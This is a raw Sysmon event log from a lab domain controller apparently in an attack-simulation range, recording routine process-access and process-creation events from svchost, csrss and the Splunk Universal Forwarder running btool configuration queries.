12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.444{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-E000-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-DF00-00000000AE01}71367140C:\Windows\system32\cmd.exe{266CAFBE-64EE-6064-E000-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000008192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.450{266CAFBE-64EE-6064-E000-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EE-6064-DF00-00000000AE01}7136C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000008191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DF00-00000000AE01}7136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.444{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DF00-00000000AE01}7136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-DB00-00000000AE01}70607064C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EE-6064-DF00-00000000AE01}7136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-DF00-00000000AE01}7136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000008183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.398{266CAFBE-64EE-6064-DE00-00000000AE01}71127116C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.148{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DE00-00000000AE01}7112C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.148{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.148{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.148{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.148{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DE00-00000000AE01}7112C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.148{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.148{266CAFBE-64EE-6064-DD00-00000000AE01}70927096C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EE-6064-DE00-00000000AE01}7112C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.152{266CAFBE-64EE-6064-DE00-00000000AE01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EE-6064-DD00-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000008174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DD00-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.133{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DD00-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-64EE-6064-DC00-00000000AE01}70807084C:\Windows\system32\cmd.exe{266CAFBE-64EE-6064-DD00-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000008167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.145{266CAFBE-64EE-6064-DD00-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EE-6064-DC00-00000000AE01}7080C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000008166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DC00-00000000AE01}7080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
